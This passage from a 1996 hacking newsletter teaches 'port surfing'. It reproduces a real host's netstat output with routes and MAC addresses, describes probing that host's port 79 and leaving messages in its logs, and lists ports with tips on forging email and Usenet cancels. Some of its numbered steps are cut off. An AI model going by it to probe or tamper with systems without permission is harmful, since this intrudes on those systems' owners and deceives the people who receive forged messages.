204.252.102.2 ENSS365.NM.ORG Up,Gateway,H 0 109 se0 1500
205.160.243.2 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.213.4.2 ENSS365.NM.ORG Up,Gateway,H 0 4 se0 1500
202.216.224.66 ENSS365.NM.ORG Up,Gateway,H 0 113 se0 1500
192.132.89.3 ENSS365.NM.ORG Up,Gateway,H 0 1100 se0 1500
198.203.196.67 ENSS365.NM.ORG Up,Gateway,H 0 385 se0 1500
160.205.13.3 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500
202.247.107.131 ENSS365.NM.ORG Up,Gateway,H 0 19 se0 1500
198.59.167.4 LAWRII.NM.ORG Up,Gateway,H 0 82 se0 1500
128.148.157.6 ENSS365.NM.ORG Up,Gateway,H 0 198 se0 1500
160.45.10.6 ENSS365.NM.ORG Up,Gateway,H 0 3 se0 1500
128.121.50.7 ENSS365.NM.ORG Up,Gateway,H 0 3052 se0 1500
206.170.113.8 ENSS365.NM.ORG Up,Gateway,H 0 1451 se0 1500
128.148.128.9 ENSS365.NM.ORG Up,Gateway,H 0 1122 se0 1500
203.7.132.9 ENSS365.NM.ORG Up,Gateway,H 0 14 se0 1500
204.216.57.10 ENSS365.NM.ORG Up,Gateway,H 0 180 se0 1500
130.74.1.75 ENSS365.NM.ORG Up,Gateway,H 0 10117 se0 1500
206.68.65.15 ENSS365.NM.ORG Up,Gateway,H 0 249 se0 1500
129.219.13.81 ENSS365.NM.ORG Up,Gateway,H 0 547 se0 1500
204.255.246.18 ENSS365.NM.ORG Up,Gateway,H 0 1125 se0 1500
160.45.24.21 ENSS365.NM.ORG Up,Gateway,H 0 97 se0 1500
206.28.168.21 ENSS365.NM.ORG Up,Gateway,H 0 2093 se0 1500
163.179.3.222 ENSS365.NM.ORG Up,Gateway,H 0 315 se0 1500
198.109.130.33 ENSS365.NM.ORG Up,Gateway,H 0 1825 se0 1500
199.224.108.33 ENSS365.NM.ORG Up,Gateway,H 0 11362 se0 1500
203.7.132.98 ENSS365.NM.ORG Up,Gateway,H 0 73 se0 1500
198.111.253.35 ENSS365.NM.ORG Up,Gateway,H 0 1134 se0 1500
206.149.24.100 ENSS365.NM.ORG Up,Gateway,H 0 3397 se0 1500
165.212.105.106 ENSS365.NM.ORG Up,Gateway,H 0 17 se0 1006
205.238.3.241 ENSS365.NM.ORG Up,Gateway,H 0 69 se0 1500
198.49.44.242 ENSS365.NM.ORG Up,Gateway,H 0 25 se0 1500
194.22.188.242 ENSS365.NM.ORG Up,Gateway,H 0 20 se0 1500
164.64.0 LAWRII.NM.ORG Up,Gateway 1 40377 se0 1500
0.0.0 ENSS365.NM.ORG Up,Gateway 2 4728741 se0 1500
207.66.1 GLORY.NM.ORG Up,Gateway 0 51 se0 1500
205.166.1 GLORY.NM.ORG Up,Gateway 0 1978 se0 1500
204.134.1 LAWRII.NM.ORG Up,Gateway 0 54 se0 1500
204.134.2 GLORY.NM.ORG Up,Gateway 0 138 se0 1500
192.132.2 129.121.248.1 Up,Gateway 0 6345 se0 1500
204.134.67 GLORY.NM.ORG Up,Gateway 0 2022 se0 1500
206.206.67 GLORY.NM.ORG Up,Gateway 0 7778 se0 1500
206.206.68 LAWRII.NM.ORG Up,Gateway 0 3185 se0 1500
207.66.5 GLORY.NM.ORG Up,Gateway 0 626 se0 1500
204.134.69 GLORY.NM.ORG Up,Gateway 0 7990 se0 1500
207.66.6 GLORY.NM.ORG Up,Gateway 0 53 se0 1500
204.134.70 LAWRII.NM.ORG Up,Gateway 0 18011 se0 1500
192.188.135 GLORY.NM.ORG Up,Gateway 0 5 se0 1500
206.206.71 LAWRII.NM.ORG Up,Gateway 0 2 se0 1500
204.134.7 GLORY.NM.ORG Up,Gateway 0 38 se0 1500
199.89.135 GLORY.NM.ORG Up,Gateway 0 99 se0 1500
198.59.136 LAWRII.NM.ORG Up,Gateway 0 1293 se0 1500
204.134.9 GLORY.NM.ORG Up,Gateway 0 21 se0 1500
204.134.73 GLORY.NM.ORG Up,Gateway 0 59794 se0 1500
129.138.0 GLORY.NM.ORG Up,Gateway 0 5262 se0 1500
192.92.10 LAWRII.NM.ORG Up,Gateway 0 163 se0 1500
206.206.75 LAWRII.NM.ORG Up,Gateway 0 604 se0 1500
207.66.13 GLORY.NM.ORG Up,Gateway 0 1184 se0 1500
204.134.77 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
207.66.14 GLORY.NM.ORG Up,Gateway 0 334 se0 1500
204.134.78 GLORY.NM.ORG Up,Gateway 0 239 se0 1500
204.52.207 GLORY.NM.ORG Up,Gateway 0 293 se0 1500
204.134.79 GLORY.NM.ORG Up,Gateway 0 1294 se0 1500
192.160.144 LAWRII.NM.ORG Up,Gateway 0 117 se0 1500
206.206.80 PENNY.NM.ORG Up,Gateway 0 4663 se0 1500
204.134.80 GLORY.NM.ORG Up,Gateway 0 91 se0 1500
198.99.209 LAWRII.NM.ORG Up,Gateway 0 1136 se0 1500
207.66.17 GLORY.NM.ORG Up,Gateway 0 24173 se0 1500
204.134.82 GLORY.NM.ORG Up,Gateway 0 29766 se0 1500
192.41.211 GLORY.NM.ORG Up,Gateway 0 155 se0 1500
192.189.147 LAWRII.NM.ORG Up,Gateway 0 3133 se0 1500
204.134.84 PENNY.NM.ORG Up,Gateway 0 189 se0 1500
204.134.87 LAWRII.NM.ORG Up,Gateway 0 94 se0 1500
146.88.0 GLORY.NM.ORG Up,Gateway 0 140 se0 1500
192.84.24 GLORY.NM.ORG Up,Gateway 0 3530 se0 1500
204.134.88 LAWRII.NM.ORG Up,Gateway 0 136 se0 1500
198.49.217 GLORY.NM.ORG Up,Gateway 0 303 se0 1500
192.132.89 GLORY.NM.ORG Up,Gateway 0 3513 se0 1500
198.176.219 GLORY.NM.ORG Up,Gateway 0 1278 se0 1500
206.206.92 LAWRII.NM.ORG Up,Gateway 0 1228 se0 1500
192.234.220 129.121.1.91 Up,Gateway 0 2337 se0 1500
204.134.92 LAWRII.NM.ORG Up,Gateway 0 13995 se0 1500
198.59.157 LAWRII.NM.ORG Up,Gateway 0 508 se0 1500
206.206.93 GLORY.NM.ORG Up,Gateway 0 635 se0 1500
204.134.93 GLORY.NM.ORG Up,Gateway 0 907 se0 1500
198.59.158 LAWRII.NM.ORG Up,Gateway 0 14214 se0 1500
198.59.159 LAWRII.NM.ORG Up,Gateway 0 1806 se0 1500
204.134.95 PENNY.NM.ORG Up,Gateway 0 3644 se0 1500
206.206.96 GLORY.NM.ORG Up,Gateway 0 990 se0 1500
206.206.161 LAWRII.NM.ORG Up,Gateway 0 528 se0 1500
198.59.97 PENNY.NM.ORG Up,Gateway 0 55 se0 1500
198.59.161 LAWRII.NM.ORG Up,Gateway 0 497 se0 1500
192.207.226 GLORY.NM.ORG Up,Gateway 0 93217 se0 1500
198.59.99 PENNY.NM.ORG Up,Gateway 0 2 se0 1500
198.59.163 GLORY.NM.ORG Up,Gateway 0 3379 se0 1500
192.133.100 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500
204.134.100 GLORY.NM.ORG Up,Gateway 0 8 se0 1500
128.165.0 PENNY.NM.ORG Up,Gateway 0 15851 se0 1500
198.59.165 GLORY.NM.ORG Up,Gateway 0 274 se0 1500
206.206.165 LAWRII.NM.ORG Up,Gateway 0 167 se0 1500
206.206.102 GLORY.NM.ORG Up,Gateway 0 5316 se0 1500
160.230.0 LAWRII.NM.ORG Up,Gateway 0 19408 se0 1500
206.206.166 LAWRII.NM.ORG Up,Gateway 0 1756 se0 1500
205.166.231 GLORY.NM.ORG Up,Gateway 0 324 se0 1500
198.59.167 GLORY.NM.ORG Up,Gateway 0 1568 se0 1500
206.206.103 GLORY.NM.ORG Up,Gateway 0 3629 se0 1500
198.59.168 GLORY.NM.ORG Up,Gateway 0 9063 se0 1500
206.206.104 GLORY.NM.ORG Up,Gateway 0 7333 se0 1500
206.206.168 GLORY.NM.ORG Up,Gateway 0 234 se0 1500
204.134.105 LAWRII.NM.ORG Up,Gateway 0 4826 se0 1500
206.206.105 LAWRII.NM.ORG Up,Gateway 0 422 se0 1500
204.134.41 LAWRII.NM.ORG Up,Gateway 0 41782 se0 1500
206.206.169 GLORY.NM.ORG Up,Gateway 0 5101 se0 1500
204.134.42 GLORY.NM.ORG Up,Gateway 0 10761 se0 1500
206.206.170 GLORY.NM.ORG Up,Gateway 0 916 se0 1500
198.49.44 GLORY.NM.ORG Up,Gateway 0 3 se0 1500
198.59.108 GLORY.NM.ORG Up,Gateway 0 2129 se0 1500
204.29.236 GLORY.NM.ORG Up,Gateway 0 125 se0 1500
206.206.172 GLORY.NM.ORG Up,Gateway 0 5839 se0 1500
204.134.108 GLORY.NM.ORG Up,Gateway 0 3216 se0 1500
206.206.173 GLORY.NM.ORG Up,Gateway 0 374 se0 1500
198.175.173 LAWRII.NM.ORG Up,Gateway 0 6227 se0 1500
198.59.110 GLORY.NM.ORG Up,Gateway 0 1797 se0 1500
198.51.238 GLORY.NM.ORG Up,Gateway 0 1356 se0 1500
192.136.110 GLORY.NM.ORG Up,Gateway 0 583 se0 1500
204.134.48 GLORY.NM.ORG Up,Gateway 0 42 se0 1500
198.175.176 LAWRII.NM.ORG Up,Gateway 0 32 se0 1500
206.206.114 LAWRII.NM.ORG Up,Gateway 0 44 se0 1500
206.206.179 LAWRII.NM.ORG Up,Gateway 0 14 se0 1500
198.59.179 PENNY.NM.ORG Up,Gateway 0 222 se0 1500
198.59.115 GLORY.NM.ORG Up,Gateway 1 132886 se0 1500
206.206.181 GLORY.NM.ORG Up,Gateway 0 1354 se0 1500
206.206.182 SIENNA.NM.ORG Up,Gateway 0 16 se0 1500
206.206.118 GLORY.NM.ORG Up,Gateway 0 3423 se0 1500
206.206.119 GLORY.NM.ORG Up,Gateway 0 282 se0 1500
206.206.183 SIENNA.NM.ORG Up,Gateway 0 2473 se0 1500
143.120.0 LAWRII.NM.ORG Up,Gateway 0 123533 se0 1500
206.206.184 GLORY.NM.ORG Up,Gateway 0 1114 se0 1500
205.167.120 GLORY.NM.ORG Up,Gateway 0 4202 se0 1500
206.206.121 GLORY.NM.ORG Up,Gateway 1 71 se0 1500
129.121.0 GRANDE.NM.ORG Up 12 21658599 se0 1500
204.134.122 GLORY.NM.ORG Up,Gateway 0 195 se0 1500
204.134.58 GLORY.NM.ORG Up,Gateway 0 7707 se0 1500
128.123.0 GLORY.NM.ORG Up,Gateway 0 34416 se0 1500
204.134.59 GLORY.NM.ORG Up,Gateway 0 1007 se0 1500
204.134.124 GLORY.NM.ORG Up,Gateway 0 37160 se0 1500
206.206.124 LAWRII.NM.ORG Up,Gateway 0 79 se0 1500
206.206.125 PENNY.NM.ORG Up,Gateway 0 233359 se0 1500
204.134.126 GLORY.NM.ORG Up,Gateway 0 497 se0 1500
206.206.126 LAWRII.NM.ORG Up,Gateway 0 13644 se0 1500
204.69.190 GLORY.NM.ORG Up,Gateway 0 4059 se0 1500
206.206.190 GLORY.NM.ORG Up,Gateway 0 1630 se0 1500
204.134.127 GLORY.NM.ORG Up,Gateway 0 45621 se0 1500
206.206.191 GLORY.NM.ORG Up,Gateway 0 3574 se0 1500
MultiNet IPX Routing tables:
Destination Gateway Flags Refcnt Use Interface MTU
---------- ---------- ----- ------ ----- --------- ----
MultiNet ARP table:
Host Network Address Ethernet Address Arp Flags
-------------------------------------------- ---------------- ---------
GLORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61:D0 Temporary
[UNKNOWN] (IP 129.121.251.1) 00:C0:05:01:2C:D2 Temporary
NARANJO.NM.ORG (IP 129.121.1.56) 08:00:87:04:9F:42 Temporary
CHAMA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C:D0 Temporary
[UNKNOWN] (IP 129.121.251.5) AA:00:04:00:D2:D0 Temporary
LAWRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C:D0 Temporary
[UNKNOWN] (IP 129.121.1.91) 00:C0:05:01:2C:D2 Temporary
BRAVO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B:D0 Temporary
PENNY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F:D0 Temporary
ARRIBA.NM.ORG (IP 129.121.1.14) 08:00:2B:BC:C1:A7 Temporary
AZUL.NM.ORG (IP 129.121.1.51) 08:00:87:00:A1:D3 Temporary
ENSS365.NM.ORG (IP 129.121.1.3) 00:00:0C:51:EF:58 Temporary
AVATAR.NM.ORG (IP 129.121.254.1) 08:00:5A:1D:52:0D Temporary
[UNKNOWN] (IP 129.121.253.2) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.254.5) 00:C0:7B:5F:5F:80 Temporary
CONCHAS.NM.ORG (IP 129.121.1.11) 08:00:5A:47:4A:1D Temporary
[UNKNOWN] (IP 129.121.253.10) AA:00:04:00:4B:D0 Temporary
MultiNet Network Interface statistics:
Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Collis
---- --- ------- -------------- ----- ----- ----- ----- ------
se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0
lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0
MultiNet Protocol statistics:
65264173 IP packets received
22 IP packets smaller than minimum size
6928 IP fragments received
4 IP fragments timed out
34 IP received for unreachable destinations
704140 ICMP error packets generated
9667 ICMP opcodes out of range
4170 Bad ICMP packet checksums
734363 ICMP responses
734363 ICMP "Echo" packets received
734363 ICMP "Echo Reply" packets sent
18339 ICMP "Echo Reply" packets received
704140 ICMP "Destination Unreachable" packets sent
451243 ICMP "Destination Unreachable" packets received
1488 ICMP "Source Quench" packets received
163911 ICMP "ReDirect" packets received
189732 ICMP "Time Exceeded" packets received
126966 TCP connections initiated
233998 TCP connections established
132611 TCP connections accepted
67972 TCP connections dropped
28182 embryonic TCP connections dropped
269399 TCP connections closed
10711838 TCP segments timed for RTT
10505140 TCP segments updated RTT
3927264 TCP delayed ACKs sent
666 TCP connections dropped due to retransmit timeouts
111040 TCP retransmit timeouts
3136 TCP persist timeouts
9 TCP persist connection drops
16850 TCP keepalive timeouts
1195 TCP keepalive probes sent
14392 TCP connections dropped due to keepalive timeouts
28842663 TCP packets sent
12714484 TCP data packets sent
1206060086 TCP data bytes sent
58321 TCP data packets retransmitted
22144036 TCP data bytes retransmitted
6802199 TCP ACK-only packets sent
1502 TCP window probes sent
483 TCP URG-only packets sent
8906175 TCP Window-Update-only packets sent
359509 TCP control packets sent
38675084 TCP packets received
28399363 TCP packets received in sequence
1929418386 TCP bytes received in sequence
25207 TCP packets with checksum errors
273374 TCP packets were duplicates
230525708 TCP bytes were duplicates
3748 TCP packets had some duplicate bytes
493214 TCP bytes were partial duplicates
2317156 TCP packets were out of order
3151204672 TCP bytes were out of order
1915 TCP packets had data after window
865443 TCP bytes were after window
5804 TCP packets for already closed connection
941 TCP packets were window probes
10847459 TCP packets had ACKs
222657 TCP packets had duplicate ACKs
1 TCP packet ACKed unsent data
1200274739 TCP bytes ACKed
141545 TCP packets had window updates
13 TCP segments dropped due to PAWS
4658158 TCP segments were predicted pure-ACKs
24033756 TCP segments were predicted pure-data
8087980 TCP PCB cache misses
305 Bad UDP header checksums
17 Bad UDP data length fields
23772272 UDP PCB cache misses
MultiNet Buffer Statistics:
388 out of 608 buffers in use:
30 buffers allocated to Data.
10 buffers allocated to Packet Headers.
66 buffers allocated to Socket Structures.
57 buffers allocated to Protocol Control Blocks.
163 buffers allocated to Routing Table Entries.
2 buffers allocated to Socket Names and Addresses.
48 buffers allocated to Kernel Fork-Processes.
2 buffers allocated to Interface Addresses.
1 buffer allocated to Multicast Addresses.
1 buffer allocated to Timeout Callbacks.
6 buffers allocated to Memory Management.
2 buffers allocated to Network TTY Control Blocks.
11 out of 43 page clusters in use.
11 CXBs borrowed from VMS device drivers
2 CXBs waiting to return to the VMS device drivers
162 Kbytes allocated to MultiNet buffers (44% in use).
226 Kbytes of allocated buffer address space (0% of maximum).
Connection closed by foreign host.
Whoa! What was all that?
What we did was telnet to port 15 -- the netstat port-- which on some computers runs a daemon that tells anybody who cares to drop in just about everything about the connection made by all the computers linked to the Internet through this computer.
So from this we learned two things:
1) Grande.nm.org is a very busy and important computer.
2) Even a very busy and important computer can let the random port surfer come and play.
So my lady friend wanted to try out another port. I suggested the finger port, number 79. So she gave the command:
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
finger
?Sorry, could not find "FINGER"
Connection closed by foreign host.
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
help
?Sorry, could not find "HELP"
Connection closed by foreign host.
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
?
?Sorry, could not find "?"
Connection closed by foreign host.
Trying 129.121.1.2 ...
Connected to grande.nm.org.
Escape character is '^]'.
man
?Sorry, could not find "MAN"
Connection closed by foreign host.
At first this looks like just a bunch of failed commands. But actually this is pretty fascinating. The reason is that port 79 is, under IETF rules, supposed to run fingerd, the finger daemon. So when she gave the command “finger” and grande.nm.org said ?Sorry, could not find "FINGER,” we knew this port was not following IETF rules.
Now on may computers they don’t run the finger daemon at all. This is because finger has so properties that can be used to gain total control of the computer that runs it.
But if finger is shut down, and nothing else is running on port 79, we woudl get the answer:
telnet: connect: Connection refused.
But instead we got connected and grande.nm.org was waiting for a command.
Now the normal thing a port surfer does when running an unfmiliar daemon is to coax it into revealing what commands it uses. “Help,” “?” and “man” often work. But it didn’t help us.
But even though these commands didn’t help us, they did tell us that the daemon is probably something sensitive. If it were a daemon that was meant for anybody and his brother to use, it would have given us instructions.
So what did we do next? We decided to be good Internet citizens and also stay out of jail We decided we’d beter log off.
But there was one hack we decided to do first: leave our mark on the shell log file.
The shell log file keeps a record of all operating system commands made on a computer. The adminsitrator of an obviously important computer such as grande.nm.org is probably competent enough to scan the records of what commands are given by whom to his computer. Especially on a port important enough to be running a mystery, non-IETF daemon. So everything we types while connected was saved on a log.
So my friend giggled with glee and left a few messages on port 79 before logging off. Oh, dear, I do believe she’s hooked on hacking. Hmmm, it could be a good way to meet cute sysadmins...
So, port surf’s up! If you want to surf, here’s the basics:
1) Get logged on to a shell account. That’s an account with your ISP that lets you give Unix commands. Or -- run Linux or some other kind of Unix on your PC and hook up to the Internet.
2) Give the command “telnet
3) If you get the response “connected to
Following are some of my favorite ports. It is legal and harmless to pay them visits so long as you don’t figure out how to gain superuser status while playing with them. However, please note that if you do too much port surfing from your shell account, your sysadmin may notice this in his or her shell log file. If he or she is prejudiced against hacking , you may get kicked off your ISP. So you may want to explain in advance that you are merely a harmless hacker looking to have a good time, er, um, learn about Unix. Yeh, that sounds good...
Port number Service Why it’s phun!
7 echo Whatever you type in, the host repeats back to you, used for ping
9 discard Dev/null -- how fast can you figure out this one?
11 systat Lots of info on users
13 daytime Time and date at computer’s location
15 netstat Tremendous info on networks but rarely used any more
19 chargen Pours out a stream of ASCII characters. Use ^C to stop.
21 ftp Transfers files
22 ssh secure shell login -- encrypted tunnel
23 telnet Where you log in if you don’t use ssh:)
25 smpt Forge email from Bill.Gates@Microsoft.org.
37 time Time
39 rlp Resource location
43 whois Info on hosts and networks
53 domain Nameserver
70 gopher Out-of-date info hunter
79 finger Lots of info on users
80 http Web server
110 pop Incoming email
119 nntp Usenet news groups -- forge posts, cancels
443 shttp Another web server
512 biff Mail notification
513 rlogin Remote login
who Remote who and uptime
514 shell Remote command, no password used!
syslog Remote system logging -- how we bust hackers
520 route Routing information protocol
**************************
Propeller head tip: Note that in most cases an Internet host will use these port number assignments for these services. More than one service may also be assigned simultaneously to the same port. This numbering system is voluntarily offered by the Internet Engineering Task Force (IETF). That means that an Internet host may use other ports for these services. Expect the unexpected!
If you have a copy of Linux, you can get the list of all the IETF assignments of port numbers in the file /etc/services.
********************************
_________________________________________________________
To subscribe to the Happy Hacker list, email hacker@techbroker.com with messge “subscribe hh.” Send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end..
________________________________________________________
Subscribe to:
Posts (Atom)
